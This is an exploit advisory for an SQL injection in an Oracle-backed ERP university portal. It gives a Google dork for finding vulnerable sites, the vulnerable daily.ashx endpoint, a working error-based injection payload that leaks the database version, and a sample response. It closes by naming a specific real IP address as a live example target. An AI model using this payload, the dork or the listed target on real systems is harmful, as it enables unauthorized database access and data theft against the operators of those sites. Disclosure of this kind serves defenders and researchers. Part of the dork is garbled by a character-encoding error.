# Exploit Author: Shahram Darvishvand [karaji_kt21]  <darvishvand.shahram[at]gmail[dot]com>  # Exploit Title: [erp (Enterprise Resource plannin) SQL Injection Vulnerability ]  # Vendor : sida university system  # Date: [4/May/2012]  # Google Dork:   "نرم Ø§ÙØ²Ø§Ø± جامع erp شامل قوانین Ú©Ù¾ÛŒ رایت Ù…ÛŒ باشد Ùˆ نوع نسخه بتا Ù…ÛŒ باشد"  # Version: [ 1389/09/17 ]  # Tested on: [ASHX .. Application powered by Oracle DBMS] ============================================================ ** This Vulnerability Is On version 1389/09/17 ** -------------------------------------------- Exploit :  http://[IP Or Domain]/Portal/WUC/daily.ashx?title= ============================================================= Example :  http://[IP Or Domain]/Portal/WUC/daily.ashx?title= 'or%201=utl_inaddr.get_host_address((select%20banner%20from%20v$version%20where%20rownum=1))-- Response : Oracle Database 11g Enterprise Edition Release 11.1.0.7.0 - 64bit ========================================================== [+] Greetz : Fahime.Saveh , Behrooz_Ice ******************************** For Screen shot 1 : http://46.225.126.74/Portal/WUC/daily.ashx?title='or%201=utl_inaddr.get_host_address((select%20banner%20from%20v$version%20where%20rownum=1))-- For Screen Shot 2 : http://46.225.126.74/Portal/WUC/daily.ashx?title='or%201=utl_inaddr.get_host_address((select%20banner%20from%20v$version%20where%20rownum=1))--